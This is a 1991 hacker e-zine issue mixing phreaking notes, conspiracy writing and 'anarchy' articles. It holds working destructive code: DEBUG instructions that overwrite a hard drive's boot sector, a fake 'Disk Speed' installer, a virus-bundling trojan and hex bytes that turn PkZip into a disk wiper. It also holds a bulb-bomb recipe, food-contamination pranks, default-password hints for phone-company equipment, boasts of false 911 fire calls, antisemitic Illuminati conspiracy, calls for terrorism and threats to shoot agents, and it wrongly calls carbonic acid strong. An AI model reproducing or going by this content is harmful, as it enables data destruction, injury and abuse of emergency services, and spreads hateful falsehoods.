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              A Magazine for Cyberpunks and Other Hi-Tech Low-Lifes

               Issue No. 01                         October '91
                           A Danger Kult Production.


            These filez are for educational and informational studies
            only.  The writers for Digital Murder will not be responsible
            for any use or misuse of information published in this
            disk-based magazine.  The magazine and its contents are
            free to the public and may be freely distributed in any
            form as long as Digital Murder magazine and the author
            is given credit.


                              Information is Power.

    Greetings and welcome to the first         ///  / ///  / /////  //  /
    issue of Digtal Murder.  This pro-        /  / / /    /   /   /  / /
    ject has taken too long but I hope       /  / / / '/ /   /   //// /
    future issues come out on time and      ///  / //// /   /   /  / /////
    more people get involved.  If  you
    are interested in sending articles    //    // // // ///   ///  ////  ///
    to us then call one of our support   ///  /// // // /  /  /  / /     /  /
    boards or write us at our P.O.Box.  // // // // // ///   /  / /''   ///
    We have many other projects in the //    // ///// //  \ ///  ///// //  \
    works as well as  making  improve-
    ments to the 'zine as we go along.              P.O. Box 280363
    This is the 80 column  version  of                Memphis, TN
    Digital Murder.  We also have a 40                   38168
    column version of each issue.

    We hope to have a letters  section          Editor:  Morpheus
    in this zine so drop us a line  in
    our P.O. Box.  Hate mail, articles         Writers:  Morpheus
    for the 'zine, ads for boards  and                   Blackened
    other 'zines, questions, comments,                   Technysis
    etc. . are all welcome.                              Neuron God
                                                         Placebo Effect
                                                         Digital Terrorist

                                         Support:  Backdoor--901.386.6455

                           I N   T H I S   I S S U E
    Page#                -=-=-=-=-=-=-=-=-=-=-=-=-=-=-

      3   From the Mouth of Blackened-- Editorial from veteran Phreak.
      4   Secret Societies in Govt.  -- Placebo Effect exploits all.
      6   Fnords                     -- Subliminal control by Binky.
      7   Anarchy For Sale           -- Digital Murder's Anarchy Cookbook.
      8   Phun with Frozen Shit      -- literally...by Neuron God.
      9   Lineage 2000 RAS Tech Info.-- A look at Voltage monitoring sys.
     11   Phun with 911              -- Technysis and Blackened's adventures.
     13   Scan of the Month Club     -- A few things to keep you busy.
     15   There's a Virus in my Soup -- Techniques by Digital Terrorist.
     17   Phone Company Hate Mail    -- Letter of humorous interest.
     19   Heaven's Trash             -- Final Words from Morpheus.


         From the Mouth of Blackened

         Well, I have some shit to say.  First off, fuck Wild Cat, the dude
         who turned me in to the Secret Service.  Next, just because I have
         not been seen on the Backdoor doesn't mean I am not  the  official
         SysOp still.  Technysis can't be God forever. . . Hahaha.  Onward.

         I started off in late '84 as a young punk ass but soon  progressed
         to higher knowledge of phreaking.  I then escalated  my  knowledge
         even further.  I have dropped out of the scene more and more  this
         past year or so but you know how it is. . . real life  comes  into
         play at some point.  I realize that all this undergroud mayhem  is
         truly nessecery for the advancement of our social/security  system
         as a whole.  It's cool to hack a military defense system which  me
         and Morpheus have done on occasion BUT you don't want some asshole
         behind the keys trying to kill us all so it all works out  evenly.
         Some people get busted, the security of a  system  is  spruced  up
         and the new generation of hackers is born.  The system is cracked,
         more people get busted.  It goes on and on.  With  out  crackdowns
         and system pipe-ups we would all have equal knowledge and then  no
         one would learn from each other.  That would be just plain boring.
         Shit, punks might start doing homework at night again  instead  of
         infultrating systems for the cause:  The cause for the freedom  of
         information attainment and exchange.  INFORMATION IS POWER.

         Well enuff of my philosophy...which no one probably understands.
         I'm out of here for now but remember. . .
                   Pussy is cool, but when its dead, its cold.



         Hmmm... well we have what... a fuckin' half page or so left.

         Fuck it.  I'm tired.  Just read my other  articles  in  this

         Issue of Digital Murder.  Look at the  rest  of  this  empty

         page.  Stare at it.  Feel the power of negative space.

         How low can you go?



     *Secret Societies and the Secret Government*
     A text-file by Placebo Effect (DK, InFOWORD)

     Today's world is a difficult world, as we can all relate to.  We live
     in a country that was based on some really good ideas, but has since
     moved in the opposite direction from freedom to oppression and
     dictatorship.  Our elected officials are not representing us, the
     people, but the big businesses, corporations, anyone with enough
     money to contribute to their own pockets.  We live in a nation where
     double standards are a way of life, where the budget needs to be
     balanced and the deficit is huge, and where on top of all these
     problems, Congress can give themselves a raise for causing all this
     shit to happen.  This article is to open awareness to these problems
     and how they affect YOU, the person, the CITIZEN of the United
     Socialist Republic of Amerika.

     As information is suppressed and the truth denied, it is hard to
     believe what others say.  The lies are said to be truths, truths to
     be lies, and coverups to be a great way to get laid.  Please believe
     the contents of this file, as they are TRUE, in the eyes of any
     openminded nonsheep human.

     We, the Goyim (human cattle) live for the whims of a few.  Many of the
     people in the resistance call these few the ILLUMINATI.  These people
     DO exist, and are destroying the world to this day, preparing it for
     total domination by the rich and powerful.  The government denies all
     existance of this Super-ELITE group, because the ILLUMINATI controls
     all the governments of the world to some extent.  Massive coverups,
     lies, distorted truths, murder, are all the tools of the Illuminati.
     Never be fooled by the halftruth telling lying mother fuckers of

     The story goes back centuries ago, but I will start a mere century and
     a half ago, in 1840.  In 1840, General Albert Pike came under
     influence of other One Worlders (people for one world government) and
     decided to build a military blueprint that calls for 3 world wars and
     3 major revolutions.  He did most of his work in a 13 room mansion in
     Little Rock, Arkansas.  When the Illuminati, and the lodges of the
     Grand Orient became suspect, Pike organized The New and Reformed
     Palladian Rite.  He established three supreme councils; one in
     Charleston, S.C., another in Rome, Italy and another in Berlin,
     Germany.  He had another one worlder, Mazzini, establish 23
     subordinate councils in strategic locations throughout the world,
     which have been the secret headquarters of the world revolutionary
     movement ever since.  These councils secret controlled inconspicuous
     "incidents" that took place all over the world that would lead to the
     spark of war.

     Pike's plan required that Communism, Naziism, Political Zionism, and
     other International movements be organized and used to foment the
     three global wars and three major revolutions.  The First World War
     was to be fought so as to enable the Illuminai to overthrow the
     powers of the Tzars in Russia and turn that country into the
     stronghold of Atheistic-Communism.  The differences stirred up by
     agentur of the Illuminati between the British and German Empires were
     to be used to foment this war.  After the war ended, Communism was to
     be built up and used to destroy other governments.


     World War Two was to be fomented by using the differences between
     Fascists and Political Zionists.  This war was to be fought so that
     Naziism would be destroyed and the power of Political Zionism
     increased so that the sovereign state of Israil could be established
     in Palestine.  during World War Two, International Communism was to be
     built up until it equalled in strength that of united Christendom.
     At this point it was to be contained and kept in check until required
     for the final social cataclysm.

     World War Three is to be fomented by using the differences the agentur
     of the Illuminati stir up between Political Zionists and the leaders
     of the Moslem world.  The war is to be directed in such a manner that
     Islam (the Arab World including Mohammedanism) and Political Zionism
     (including the State of Israel) will destroy themselves while at the
     same time the remaining nations, once more divided against each other
     on this issue, will be forced to fight themselves into a state of
     complete exhaustion physically, mentally, spiritually and

     Pike, on August 15, 1871, told Mazzini that after World War Three is
     ended, those who aspire to undisputed world domination will provoke
     the greatest social cataclysm the world has ever known.  Quoting a
     letter (taken from a letter catalogued in the British Museum Library,
     London, England):

       "We shall unleash the Nihilists and Atheists, and we shall provoke a
        formidable social cataclysm which in all its horror will show clearly
        to the nations the effect of absolute atheism, origin of savagery and
        of the most bloody turmoil.  Then everywhere, the citizens, obliged
        to defend themselves against the world minority of revolutionaries,
        will exterminate those destroyers of civilization, and the multitude,
        disillusioned with Christianity, whose deistic spirits will be from
        that moment without compass (direction), anxious for an ideal, but
        without knowing where to render its adoration, will receive the true
        light through the universal manifestation of the pure doctrine of
        Lucifer, brought finally out in the public view, a manifestation
        which will result from the general reactionary movement which will
        follow the destruction of Christianity and atheism, both conquered
        and exterminated at the same time."

     People, we are sheep being led to slaughter.  Our brothers are dying
     in foreign wars created by these powermonger assholes we call Big
     Business.  We must fight this evil with all our heart and dedication.
     Terrorism against big business, against government.  VOTE for
     competent people who can think with their heads, not with their
     pocketbook.  Get the crooks out of Congress, Senate, White House and
     maybe we can salvage whats left of this shitty nation.

     I hope you read this file with earnest and learned that YOU are just a
     Pawn.  Expendable.  But it doesn't have to be that way.


                                  F N O R D S !

        This article was found late one nite on the Digital Murder article
   submissions UD area.  The beginning was screwed up a little but I  left
   all I could salvage in order to give proper credit to  the  author  and
   others responsible for its publication.  The article is great so read!!
   Thanks to whoever uploaded it to the Backdoor and, last but not  least,
   THE WRITER, Binky, who deserves proper credit.   -Morpheus/Editor.

   By: Binky                                                         - RoR -
   Shawn-Da-Lay Boy Productions, Inc.
   ---The HQ of SDBP, inc - 415.236.2371--The Electric Pub - 415.236.4380---
   -Primary Drop Sites-----Rat Head - 415.524.3649-----Primary Drop Sites---

        A Fnord is a word that you have, unknowingly since  the  start  of
   your ''education'', been conditioned to associate with fear and unease.
   You have also been conditioned not to notice that they are there.   The
   institution of ''Fnord conditioning'' in American elementary  education
   was first done in the fifties.  Why do this?  Well, if a government  or
   other large organization wants to have some immediate control of  large
   crowds, they must use preconditioned reflexes.  Fear and general unease
   are always good emotions to evoke when seeking  control.   The  use  of
   Fnords in news casting  can  be  used  to  create  either  a  sense  of
   revultion towards specific people or things (creating bias without your
   knowing why) or, applied differently, a sense of urgency and importance
   towards the issues focused upon.

        The use, or specific lack of use, of Fnords in advertising is  the
   reason that the American public only feels happy when they're consuming.
   It works something like this:  Everyday the people are  bombarded  with
   thousands of Fnords - in newspapers, newscasts, television shows, radio
   programs, lectures, texbooks, novels, etc.  Therefore,  as  Fnords  are
   creating unease at every turn, a lack of Fnords causes  great  relief -
   much like taking off a heavy pack after hiking all day.  The  folks  at
   Madison Avenue realize this all too well, and use it to their  benefit.
   By including absolutely no Fnords in their advertisements they create a
   sense of well being that always occurs , quite  inexplicably,  whenever
   their product is advertised.  After a while people begin  to  associate
   well being with that product subconsciously.   Then, next time they are
   shopping, their subconscious urges them to buy that which relieves  the
   unease, and they buy the advertised product.

   Sneaky, but very effective.  Watch for them.

   Call these other fine boards.....
   -= The Legion Outpost...................................415/521/7413 =-
   -= The Crystal Ship.....................................415/524/9951 =-
   -= The Village..........................................415/237/4145 =-
   -= Pro Leech............................................415/236/8192 =-
   -= The Nimitz Downport..................................415/276/3677 =-
   -= Lunatic Labs.........................................213/655/0691 =-
   -= Bad Dudes Hideout....................................415/391/0704 =-
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=- RoR - Alucard -=-=-=-=-=-=-=-=-=-=-=-=-=-


                  - = A N A R C H Y   F O R   S A L E = -

     Bulb Bomb  - Neuron God.

     Try this.  Put some alcohol (Isopropyl or Denatured-- Isopropyl is
     what's been tested by me..  Denatured is just plain  dangerous and
     flammable as hell...  something like 600 proof) on  a  fair  sized
     piece of steel wool.  Use quadruple-zero grade (the really powdery
     steel wool) for best effects.  Now, after you've soaked the  steel
     wool in the alcohol for a while (long enough to  get  it  to  hold
     some of the stuff) wrap it around a burned-out lightbulb.  Do  not
     use one if it is already cracked or has a hole in it anywhere.

     Next, twist the steel wool together so that it stays  without  you
     having to hold it.  Now bend a coathanger so  that  it  holds  the
     screw end of the lightbulb LOOSELY (loose enough so  that  you can
     sling the lightbulb into the air).  See what I'm getting at?  heh-
     heh-heh.  Now place the lightbulb in the launcher and light up the
     steel wool.  The alcohol will burn just hot enough to  catch  some
     of the steel wool on fire.  As the closed lightbulb gets  hot, the
     gases inside expand.  If you put the steel wool too far down  then
     the only thing that will happen is  the  lightbulb  will  separate
     from the base.  The wool should go around the fattest part  of the
     bulb.  Soft-whites work best because they are squared off.

     When the gases inside expand enough... BOOM!!  You should let  the
     alcohol burn for a couple of seconds before you launch the sucker.
     If not it will hit the ground before it explodes.  This  will  not
     work every time.  By the way they're made, lightbulbs come out all
     different thicknesses, with all different amounts of  gas  inside,
     different mixtures of gas, etc.  Experiment and find your favorite
     kind of bulb for this.  The timing will  depend  heavily  on  what
     kind of bulb you use so experiment here as well.

     USE SAFETY GOGGLES!!!  Your eyes will be damaged beyond all repair
     if this sucker goes wrong.  Although we are not responsible if you
     are careless and get hurt, we still stress SAFETY in your anachist
     ventures.  Be careful and alwayz smile while you destroy.

     Condensing Coke

     This should let you use a regular soft drink (like Coke) to make a
     strong acid.  Stretch a balloon over the top of a Coke can (before
     you open it).  CAREFULLY open the can so that the CO2  coming  out
     of it is captured in the balloon.  Let the coke sit until  all  of
     the CO2 is out of the Coke and in the balloon.  It's a  good  idea
     to stretch the balloon out first, and fasten it tightly around the

     Now, if you get enough CO2 in the balloon, you should be  able  to
     close off the end and have an inflated balloon, full of CO2.   Now
     all you have to do is get a SMALL amount of water and add the  CO2
     into it.  The most common method of doing this is by  putting  the
     balloon over a container of some kind and applying pressure to the
     balloon to force the CO2 into the cup.  For the CO2 to dissolve in
     the water, the water must be kept cool, so surround the  cup  with


     ice.  Now, depending on how well you  captured  the  CO2  and  the
     mineral content of your tap water, you should have  Carbonic Acid,
     which is a strong acid.  There are other more assured  methods  of
     producing CO2 (baking soda and vinegar) but with this  method  you
     have the CO2 prepackaged.

     Try forcing CO2 into the water using chem lab glassware if you can
     find it.  To do that you should set it up so that the CO2 produces
     bubbles in the water.  Keep producing more and  more  CO2  until a
     piece of Magnesium will react with your acid.  Always remember  to
     keep the water cool otherwise the gas won't dissolve into  it very

     ****               Phun with frozen shit (literally...)          ****
     ****               by: Neuron God             (9.14.91)          ****
     ****                      InFOWOrd/Danger Kult                   ****

     There are times when everyone feels like getting revenge on someone
     or just plain hates some dumbass who never seems to go away.  These
     people can be dealt with easily at only a small sacrifice  by  you.

     First, find some fresh animal shit (the fresher the better) and put
     it in your freezer until it's frozen solid.   That's the sacrifice.
     Now, when you decide among the following options,  you  can  choose
     your time and how many times you do  the  deed  according  to  your
     stockpile of shit.

     Warm & Wonderful:  Most shit smells worst when extremely hot.  Just
     put some into the victim's microwave oven or regular oven when  you
     know they won't be looking around the kitchen for a while. Go crazy
     with the settings.  For a microwave, try 99 mins  99 secs  and  see
     what happens.  You may have to adjust the time since some microwave
     won't take that much time.  Set it to the highest power.    Do  the
     same with the regular oven.  Since freezing things brings  all  the
     water in them to the surface, the thawing process should  produce a
     nice sludge-type remnant of what you put in there.   After  it   is
     thawed, the remaining material will start to cook and burn.     Not
     good for the victim.  The house/apartment  will  smell  like  burnt
     shit and they'll probably never clean their oven out.

     Up Yours:  Once again, warmth is the key.  Most people's cars run a
     little hot and so their exhaust is a good source of heat.      Just
     shove a wad of frozen shit in the tailpipe- way up there - and  let
     them do the rest.  You could also pop the hood  and  just  lay  the
     stuff on top of their engine... preferably next to the air vent....

     Don't ask what's in it:  Break the frozen shit up into small pieces
     and sprinkle it over some of their frozen foods.  Since it'll  stay
     in the freezer until they take it out, it'll probably go unnoticed.
     Then, when they take the food out to thaw, everything  you  treated
     will smell VERY unedible.


     Cubed:  The old trick with the fly stuck in  the  plastic  ice-cube
     comes to mind.. empty a tray of ice from their freezer and place  a
     couple of small pieces in the tray.  Then put water in it and place
     it on the  bottom of the ice tray stack.  By now most  people  have
     ice machines, so be creative with this one.

     In large amounts, frozen shit will create large pools of sludge when
     it is thawed since the water dissolves some of the minerals  in  it.
     This sludge is not something that one would be happy to see on their
     windows.  Try slopping it on the ground somewhere  that  the  victim
     often goes barefoot or even in their bathtub. Molded correctly, shit
     can look like a hamburger just as well as ground beef.  Just stick a
     shit burger on the grill while the victim is having his next cookout
     and watch the fun.


                                 LINEAGE 2000 RAS
                          General and Technical Outline


     Lineage 2000 Remote Access System (RAS) is used by Ma Bell to
     monitor all types of power equipment they use.  Lineage 2000
     has 16 analog and 16 binary input channels which are used for
     the system's monitoring purposes.  Each analog input channel
     can measure ac and dc voltage from 10mV to 150V with accuracy
     of 0.1% of full-scale for dc measurements and 0.7% for ac.
     The binary input channels sense the presence or absence of
     voltage in ac or dc circuits from 20V to 150V.  These are mainly
     used for monitoring alarms, relay coils or contacts, and sensing
     blown fuses.  In addition, spare unused contacts can be monitored.

     Alarm Output info
     The three alarm outputs are major alarm, minor alarm, and fault
     (aka watchdog) alarm.  These alarms are provided as form-C contacts.
     The major or minor alarm can be activated when any analog channel
     goes outside a user specified window or when any binary channel
     switches to an abnormal state.  The user decides whether any channel
     can trigger an alarm.  The user also decides which alarm to trigger.

     The watchdog alarm is a fault alarm indicating an internal fault, or
     improper software execution.  Upon experiencing a watchdog, The RAS
     actuates its watchdog alarm contacts (ie. it activates a light on the
     front panel) and tries to reset itself.

     Comm. Ports
     Lineage 2000 has two standard RS-232 ports.  Port 1 is used w/ a
     modem for dialup access (!).  Port 2 is used to daisy chain two or
     more RAS together (more on this later).  It can handle up to 8 other
     RAS units on a chain.


     System Control
     The heart of the RAS is a microprocessor in each unit that collects
     and processes data.  Each configured analog input channel is sampled
     approx. every 15 seconds.  Each measurement is compared to the alarm
     limits for that channel and used to update the internally stored
     stats.  If an alarm exists, the specified alarm relay is on until the
     situation is corrected.  The binary alarms are sampled several times
     per second and the alarms work the same of the analog alarms.

     Security Features
     Each system has a two level login.  The first login allows you
     access to the system with read access.  After first level login
     is complete, the second level can then be accessed giving the user
     read/write access.  Write level access allows you to change alarm
     limits, start trend studies, configure login screens, etc.  A quick
     reminder:  most systems still use the default passwords set up by
     the manufacturer and are relatively synonymous to the product name.
     (^HINT-HINT^)  The first level login is 1 * and 2nd level is **.
     Initial level one entrance is prompted by your standard ''Enter
     Password:''.  Enter 2nd level by typing login at * and then entering
     level two pw.

     RAS Configuration:
                         Login <> 1per system up to 70 chars.
                    Unit Desc. <> 1per unit up to 70 chars.
                 Channel Desc. <> 1per channel up to 30 chars.
                  Alarm Limits <> fully programmable
                 Scale Factors <> scale for voltage/non-voltage printouts
                 Channel Units <> Specifies voltage (V,KV,etc..)2chars max

     Statistics on other remote functions:

                 Active Alarms <> All current alarms
                 Alarm History <> 10 most recently retired alarms and
                                  3 most recently retired per channel.
               Analog Channels <> 3 max vals/3 min vals/3 max hourly avgs.
                   Trend Study <> Can be initiated for any one channel for
                                  up to 10 days.

     For those that plan to pick one up...
     Front Panel:  Black Spattered Paint (Metal)
         Chassis:  White Smoothed Paint (Metal)
            Size:  17''W x 12''H x 5''D
          Weight:  10lbs.


                   -/-P H U N   W I T H   9 1 1-/-
                   Written by:  Technysis (9.28.91)

        Well, 911 is a system that can easily be exploited for fun
        in a few simple ways.  These will be presented to  you  in
        this file in hopes of you learning a few things.

        DISCLAIMER: I am in no way responsible for the use
        of the information presented whithin this file. It
        is here for information purposes and  hypothetical
        situations (wow what a big word).

        Now that all the bullshit is out of the way let's get down
        to business.  I can guess what some of you are asking. . .
        How can we use 911 for fun?  Well, pranking it is not  fun
        in itself but how you actually do it.  I'm going  to  talk
        about one way to do it and tell a little story  about  the
        lamer way.  Ok, let's get going.

        The best way to 'get down' with 911 is through a  cordless
        telephone.  If you have an average I.Q., you'll know  that
        there are only 10 cordless frequencies around.  There  are
        10 for the handset and  10  for  the  base.  We  are  just
        concerned about the base.  Ok-a friend of mine, Blackened,
        found this out in a strange way. He took his phone handset
        out and was talking to someone then he got a revolutionary
        idea.  Maybe he could pick up someone else's base  conver-
        sation.  I went to his house and we  went  driving  around
        all over where he lives.  He had the antenna out  the  car
        window with it on listening for other people's  dialtones.

        Shure enuff, it happened.  We found one, and what luck  we
        had.  It was only several blocks from  a  fire station.  I
        parked out at the curb where the most likely spot the base
        was located at, and he had the  idea  to  call  911.  When
        they answered, it went something like this:

               911: 911, Fire, Ambulance, Police?

               BLA: Help! The heater fell over in my
                    room and caught the rug on fire!
                    It's spreading.

               911: Hold on sir, the firemen are  on
                    their way.

               BLA: Click....

                         --- ANI REDAIL ---

               911: Sir, are you there?

               BLA: Hurry, ahhh, shit, help....

               911: Sir, Mr. Stevens...

               BLA: Click....


        We could hear the fire truck on the way, so we  drove  off
        and watched from a remote observation  point.  Notice  how
        911 called back.  Since your I.Q. is pretty high, you knew
        that they would call back.  If we had left before  911 had
        a chance to call back, they would not have called the fire
        station immediately, but would've waited for  verification
        of the call.  So, you guessed it, we waited for the  call,
        and bullshitted and hung up.

        We did this several times  to  the  same  house.   It  was
        actually pretty funny to see the look on  the  homeowner's
        face when she was confronted by 5-6 firemen ready  to  put
        out a fire.  This is basically the story and the way to do
        it, but if you did not find this informative then fuck you.

        Another way, the lamer way, is to just go up to a payphone
        and dial it.  There is actually no fun  in  this,  but  it
        does the main thing.  It pisses off the 911  operators and
        distracts them from their  job.  911  is  a  service  with
        several security loop holes  left  to  be  exploited.  For
        example, not being able to trace through  a  PBX.  Usually
        that isn't possible to start with, but for the  phone  Co.
        itself, it can be done.  Why they don't?  Who  knows,  but
        that is a whole different story all together.

        Well, that brings this artice to a close  but  stay  tuned
        for more.  As you have seen, my articles are not  so  much
        geared toword the technical side but  to  application  and
        side-effects (fun) of the particular topic. I have several
        more lined up and if you want them, Digital Murder is  the

        Thanks go out to:  Blackened, for the idea  and  the  good
        times that 911 has given us.  Morpheus, editor-in chief of
        Digital Murder, for a good 'zine to put this article in.

        Call the home of Digital Murder: Backdoor/ X-Factor Whq
                                         1200/2400 24hrz a  day
                                         Demo/Text file support
                                         -Elites only.


                      Digital Murder Scan 'o' de Month!

              This month's scan of the month is by Zapped.  He is planning
          on doing this section for every issue which is a good idea since
          he does a thorough job of reporting what he finds.  I'm sure all
          of you will find something of interest within the numbers of our
          scan of the month.  Enjoy,   ...Morpheus.

     Prefix owned by:  AT&T

     800-336-0263  (dead PBX)
     800-336-9883  (wait a few rings...)

     800-336-0176  (Military system)
     800-336-0188  (Western Union Priority Mail Service-Acct. Id# prompt)
     800-336-0189  (  ''     ''      ''     ''     ''    ''    ''   ''  )
     800-336-0367  (UNIX??)
     800-336-0543  ( ''       ''       ''       ''   )
     800-336-0643  (UNIX w/ Xenix terminal server)
     800-336-0737  (Military system)
     800-336-1167  (Comdisco Computer Resource Center)
     800-336-5409  (DeRoyal Industries VAX)

     VMB systems
     800-336-0017  (Techmatic Message Center)
     800-336-0205  (GTE South's VMS)
     800-336-0276  (answering machine)
     800-336-0286  (Business Travel News-- hit # to enter VMS)
     800-336-1227  (Phoenix VMS--3 digit boxes)
     800-336-3001  (After business hrs. VMS)
     800-336-6000  (Audix VMS)
     800-336-9001  (Data General Digital Help Line & VMS)
     800-336-9004  (The Phone-Mail System)
     800-336-9161  (Ramada Inn at 6 flags--Not a VMS--ext#987 =front desk)
     800-336-9869  (Xerox Message Exchange)
     800-336-9916  (Security Pacific Bank Card VMS--4 digit boxes)
     800-336-9923  (Infrence Corp. VMS)


     Misc. Digits
     800-336-0441  (AlexPhone--Enter Soc. Sec. #--VMS?)
     800-336-0540  (FAX)
     800-336-0814  (FAX)
     800-336-0892  (FAX)
     800-336-0968  (someone's beeper..)
     800-336-0997  (FAX)
     800-336-1049  (FAX)
     800-336-1061  (FAX)
     800-336-1112  (FAX)
     800-336-1119  (wierd beeping)
     800-336-1151  (enter id)
     800-336-1152  (enter id)
     800-336-1153  (enter id)
     800-336-1154  (enter id)
     800-336-1156  (enter id)
     800-336-1178  (FAX)
     800-336-1188  (FAX)
     800-336-1208  (FAX)
     800-336-1398  (FAX)
     800-336-1452  (wierd beeping)
     800-336-1422  (FAX)
     800-336-5002  (FAX)
     800-336-9014  (FAX)
     800-336-9017  (FAX)
     800-336-9055  (wierd pulse)
     800-336-9073  (FAX)
     800-336-9840  (FAX+wierd beeping)
     800-336-9846  (FAX)
     800-336-9847  (FAX)
     800-336-9856  (FAX)
     800-336-9872  (FAX)
     800-336-9890  (enter id)


                         5 Ways To Trash An Enemy's System
                            by:  Digital Terrorist

     Well, we all certainly have those little friends who we don't like, don't
we?  Wouldn't be nice to just trash his system and be done with him?  This will

1.  If you are ever in a store that has demo computers and are bored, or, the
more likely approach- are at your enemy's computer (BBS or whatever), here is a
neat little trick you can do.  Get to DOS (depends on program they are
running.. Some are already in DOS.  Then type in the following ..
   MOV AX,0201
   MOV BX,0200
   MOV CX,01
   MOV DX,80
   INT 13
   INT 20
   E 200
   CD 19
   A 100
   MOV AX,0301

And then reboot.  The hard drive light will be on, and it will sit there..
Took down a couple of stores in a local mall at 5 minutes a store, but i type
fast, so don't expect it to go that fast.  The clerks won't know what the
hell you are doing, because they don't know shit about computes.  (Fenris Wolf)

2.  Compile this BASIC program on your computer, and send it to your "friend".
Great for those that run bbs's.  Be sure to include some ANSI drawing crap and
some docs on what it does and how to use it.  Also, include in the docs that it
can take a lot of time to run (the more time this thing gets, the more damage
it does, muhahaha!).  What it does is make tons of directories with high ascii
characters, and makes them EXTREMELY tough to delete.  Have fun with this one!

print "Disk Speed v1.2 lpha"
print "Installation program"
print:print "This could take up to 30 minutes.  Please wait"
print:print "Working";
chdir "\"
for z=1 to 7
for i=1 to 8
mkdir k$
chdir k$
print ".";
goto again

3.  This is pretty cheap, but it works, AND it's great for doing damage quickly.

Use the Norton Utilites (or PC Tools Deluxe or Mace or whatever) and have some
fun with the boot sector, file allocation tables, and root directory sectors!
Now, reboot.  Explain to your "friend" that a gigantic spark leaped through the
powerline into his computer and that's why his system is like that.  For even
more speed, use the Norton Utilites "sector copying" feature to overwrite the
first 200 sectors of his hard drive (this way, you will be sure you won't miss
much).  It's fast AND efficient...

4.  Take a magnet up to your friend's floppy disks and then erase his IBMBIO.COM
and IBMDOS.COM files (or MSDOS.SYS and IO.SYS) and his COMMAND.COM file.  Make
sure you have totally destroyed anything that will allow him to bootup.  Note,
this is a very shotty method, and not recommended.

5.  Call up your favorite virus board and download EVERY single virus you can
find.  If you are good at programming assembly, consider using synonymous
instructions in the viruses so they are hard to detect (that is, if this
favorite person uses a virus scanner).  Now, take the EXE's (or COM's) out of
the compressed file.  Make a batch file that runs all of the files.  Then,
make it into trojan horse form (add docs, ANSI crap, etc.), and name batch
file that runs all executable files, INSTALL.BAT.  When he runs INSTALL.BAT, or
any of the EXE files, he'll have tons of viruses in his system, which, if you
picked right, are very hard to remove.  This one is a great trick to play on

Five Minute Trojan

Need a trojan horse real quick?  Install the following bytes before every
B4 4C CD 21 (all this is hexadecimal- use Norton Utilites) in a popular program
such as PkZip, then change the text that says "version 1.10" (in PkZip's case)
to "version 2.00".  Obtain all PkZip docs from the original PKZ110.EXE file,
and only change parts of the documentation.  Add stuff like "PkZip v2.00 is
90% faster, written in pure assembly language, and achieves 33% better
compression."  You get the picture.  Make it a good looking trojan.   Also,
be sure to include near the front of the docs, in all caps, "DISABLE DISK
CACHES WHEN USING!!!".  This is absolutely necessary and cannot be ommitted.

Ok, here are the bytes.  They must be inserted (this is a pain, but use a text
editor, find all occurances of ascii bytes 4LM! and insert before them this:
"0123456789876543".  Now, go into Norton Utilites, search for all occurrances of
 ^^^^^^^^^^^^^^^^ text phrase.  Replace these with the hexadecimal bytes:

B4 03 B0 C8 B5 00 B1 01 B6 00 B2 00 CD 13

Now, it's ready to go.  Working correctly, this will wipe out their boot sector
and some other sectors IF

a) they don't have a disk cache installed
b) they don't have a program that intercepts direct disk writes

Now, have fun, and don't hurt anyone (muhahaha).


     The End of the Phone Network....
     Written by: Technysis

          This file was written over at a friends house one day
     while he was on the phone.  I had just taken a stereo installer
     test, on his IBM, and found out that I didn't know as much as I
     had thought.  So due to that fact, and the fact he was not in good
     conversation, I decided to write a file I wanted to send to SCB
     but then it started to get so stupid but Morpheus insisted it be
     included in the magazine to cause more trouble.

          Dear Bellsouth INC,

          It has come to my attention that you have slacked off in
     your security procedures over the past few years.  Namely your
     At&t system.  I know that when a calling card is illegally used
     overseas and is valid in the states, it is then destroyed.
     Well, if you had an average I.Q., possibly 2-10 for a Bellsouth
     employee, then you would know that Blue Boxing can still be
     done from overseas to here.  Have you not ever fixed that problem
     yet?  Get real.  This is the information age and you are supposed
     to be the experts of it, with CLASS and 5AESS, along with the
     911 system, which has many flaws.  If you have not figured out
     how to stop the hacker revolution by now, then you might as well
     give up.  The Bellsouth company, in conjunction with At&t, are
     plauged with many loopholes that can be exploited by those who
     understand and can manipulate the system.  You can expect to hear
     from our little group of seasoned hackers, and bring the networks
     to a downfall.  Those targeted are:  COSMOS, MIZAR, and the heart
     of the X-25 systems.  You may think that you are smart in the fact
     that you have stopped some of the best, like Legion of Doom and
     Craig Neidorf.  You can do nothing to stop us, so pretty soon your
     jobs may be in jeopardy.  So I am just writing this letter to let
     you know that this is the end of the beginning. The information
     age is at it's peak, and us, the pirates or so called hackers.
     Friends like Tristan have made connections with the media and have
     told the public about how the system could be exploited by those few
     talented individuals.  Consider yourself lucky that the phone network
     of this current time has not totally been destroyed. As I said
     before, this is just the prelude to the havoc and evilness that is
     about to be brought unto the phone networks of the world.

          Do you not believe this to be true?  Just count up the annual
     toll-fraud and you will see that a lot of people are serious about
     what they do and how they do it.  That just goes to show you that
     free phone calls are not all there is to phreaking.  It is the
     interaction of the trunk lines and being able to play the role of an
     under-paid low-life operator, and control the networks, to do our


          After reading the forementioned text, consider this.
     Why don't you just save yourself a lot of time and money, and
     just bring back the 5xB crossbar system.  By showing your ultimate
     incompetance, when you invented the revolutionary DTMF matrix, you
     did only one thing wrong.  You created the phreaker.  You published
     the tones for controlling the network, i.e. 2600, KT, SP, and TASI.
     But at first, pink noise could be used.  Now, blue boxing can not
     be used here inside the United States.  Back in the good ole days,
     it was fun to call for free, and start up a teleconference using
     a blue box.  Those were the days, but you have ruined them for the
     younger phreaking community.

          My one plan that I want to carry out is the legendary
     Blotto Box.  If you are smart enuff to call yourself an electronic
     enigineer, then you should know what this device can do.  That,
     coupled with opening 20-30 manholes and making spaghetti out of
     the trunk lines, will help the repairman earn a little extra money
     in overtime to help keep food on the table at home. In effect, the
     Blotto Box will pump 220 volts into a loop distribution block,
     therefore causing part of the area code to be out of service.  You
     should have fun trying to sort that mess out.

          Another pastime of me and my friends is obtaning telephone
     equipment.  I would say that I have 2-3 repeater test sets, several
     tone test sets, TS-21, a Wiltron CMTS test set, which did make a
     good gun target, a cool OFFICIAL South Central Bell hat, several
     boxes or repeater cartridges, and a nice digital line tester.
     If you should ever send a special agent to my house, should you
     ever find it, I would have no choice but to turn him into an
     Official South Central Bell target, and to be quite honest, I
     would not feel any remorse.  My hatred for Bell rises above all
     levels of comprehension that you can fanthom.

          The only way for me to release my hatred toword you is to
     find ways around any security you may come up with in the future,
     because what you have now is not much of a challenge.  Your Lineage
     2000 Remote Access System, RAS for short, or your VAX/VMS systems
